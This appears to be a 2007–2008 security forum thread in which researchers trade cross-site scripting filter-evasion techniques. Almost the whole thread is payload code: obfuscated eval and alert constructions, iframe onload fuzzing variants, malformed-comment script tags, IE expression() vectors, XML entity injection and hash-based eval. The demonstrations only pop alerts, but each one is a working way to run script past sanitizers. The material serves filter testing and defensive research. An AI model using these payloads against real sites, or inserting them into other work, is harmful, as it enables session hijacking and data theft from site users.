I've created this thread to store new XSS techniques, I'll start it off with a quoteless string without using fromCharCode:-


alert( String(/Test/).substr(1,4) );

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]



Edited 1 time(s). Last edit at 01/28/2008 07:48AM by Gareth Heyes.

That can actually be shortened to:

SCRIPT>alert(/XSS/.source)</SCRIPT>

- RSnake
Gotta love it. http://ha.ckers.org

Nice!

Using DOM nodes without calling document.DOMFUNCTION

<p><a onclick="i=createElement('iframe');i.src='javascript:alert(/XSS/)';x=parentNode;x.appendChild(i);" href="#">Test</a></p>

<!-- -- -- -- --<script>alert('XSS')</script> -- -->

It doesn't play nicely with tags around it, as it's a malformed comment. It works in FF and may bypass some obscure filter.

IE is known to loop code in the style expression() vector. Here's a fix...
<div style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCode(88,83,83));'))">

-Dan

Dan cool stuff :)

IE only:-
URL='javascript:alert(/XSS/)'

e.g. <a onclick="URL='javascript:alert(/XSS/)'" href="#">Test</a>

123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>);

that's very clever one Gareth!

More XML stuff:-
a=<r><s>eva</s><s>l</s><a>ale</a><a>rt</a><a>(1)</a></r>
0[a.s.text()](a.a.text()+'')

you could probably use xpath as well to extract the text, though it probably won't look as cool as just a.s.text(). anyhow, mozilla.org has a good writeup... see [developer.mozilla.org]

Cool might do a xpath example, if I get chance

Thanks

Awesome injection:-
x='\x61\x6c\x65\x72\x74\x28\x31\x29';
new Function(x)()

// By Me & .Mario

eval('alert(1)'):-

0['\x65\x76\x61\x6c']('\x61\x6c\x65\x72\x74\x28\x31\x29');



Edited 1 time(s). Last edit at 09/18/2007 04:15AM by Gareth Heyes.

Function('a\x6cert(1)')();

Eval + Unicode attack :-

x=eval,1,1,1;1;
1,1,1,b='\\',1,1,1;
1,1,1,s='\'',1,1,1;
1,1,1,o='0',1,1,1;
x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) );

<p>
<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41">Test</a>
</p>

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

Hi!

I really like this one because as it uses very few different characters (it doesn't need parenthesis!) :

ev setter=eval,dec setter=unescape,location.ss setter=String.prototype.substring,ev=dec=location.ss=21

the actual code is provided in the hash part of the URL like : hxxp://test.com/test#alert(%22XSS%22)

It doesn't work in IE though :-(



Edited 1 time(s). Last edit at 09/26/2007 01:33PM by Greg.

Nice stuff Greg!

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

"><script>eval(location.hash)</script> //where the url hash is: #0={};<<payload>>

note the missing .substr(1)

[p42.us]

[edit]: Firefox only



Edited 1 time(s). Last edit at 09/28/2007 02:51AM by thornmaker.

Cool stuff thornmaker!

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

You can use square brackets to call string functions (or others) like this:-
s = ! isNaN(1) ? 'javascriptz:zalertz(1)z' [/replace/ [ 'source' ] ](/z/g, [] ) : 0

Even break it up on new lines:-
s = ! isNaN(1) ? 'javascriptz:zalertz(1)z' [/replace/ [ 'source' ]
](/z/g, []
) : 0

Notice dots aren't required

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

Another one abusing unicode characters - respective their index in the unicode table:

$ =
[ '慬' ['charCodeAt'] //
(0)
,'敲' ['charCodeAt'] //
(0)
,'琨' ['charCodeAt'] //
(0)
,'≸' ['charCodeAt'] //
(0)
,'獳' ['charCodeAt'] //
(0)
,'∩' ['charCodeAt'] //
(0)
]
new //
Function //
(
decodeURI //
( //
( //
$[0] //
['toString'] //
(16) + 
$[1] //
['toString'] //
(16) +
$[2] //
['toString'] //
(16) +
$[3] //
['toString'] //
(16) +
$[4] //
['toString'] //
(16) +
$[5] //
['toString'] //
(16)
) 
['replace'] 
(/(\w{2})/g, 
'%$1')
) //
) //
( //
) //

This one won't run in the console and the forum displays the unicode chars as entities, so here's a link:
[www.php-ids.org]

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

Lucking HTML entitly encoding protects against all of this! :)

[www.owasp.org]



Edited 1 time(s). Last edit at 10/11/2007 06:38AM by jmanico.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html [
<!ENTITY inject "&#60;script&#62;alert(1)&#60;/script&#62;">
]>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Test</title>
</head>

<body>
&inject;
</body>
</html>

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

@Gareth:
Does the doctype/entity declaration have to occur before the opening html tag?

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

I've not looked into it a lot but it seems like it, you can call external dtd's which in turn can link to entities. I'd try things like include multiple HTML documents etc, also it seems the entity encodings only work for XML files although other things may be possible, I will post future research

XML POC here:-
[www.businessinfo.co.uk]

Another neat thing with this is that you can redefine existing HTML entities so &nsbp; becomes <script>alert(1)</script> hehe

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]



Edited 1 time(s). Last edit at 10/11/2007 09:11AM by Gareth Heyes.

Right I had a bit of spare time to investigate a little and I've found the following:-

1. It can only be called using XML.
2. External DTD's entities are not parsed by Firefox.
3. The entities have to be included within the document type definition.
4. HTML cannot be extended with entities etc.

Still more scope for experimentation but I hope that clears up a few things for everyone.

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

I did a bit of targeted fuzzing on a iframe for fun, here are the results:-

<iframe/ /onload=alert(/XSS/)></iframe>
<iframe/ "onload=alert(/XSS/)></iframe>
<iframe///////onload=alert(/XSS/)></iframe>
<iframe "onload=alert(/XSS/)></iframe>
<iframe<?php echo chr(11)?> onload=alert(/XSS/)></iframe>
<iframe<?php echo chr(12)?> onload=alert(/XSS/)></iframe>

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

<iframe/what ever you like in here!!!

even line breaks

/onload=alert(/xss/)></iframe>

Confirmed on FF 2.0.0.7 and IE7

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>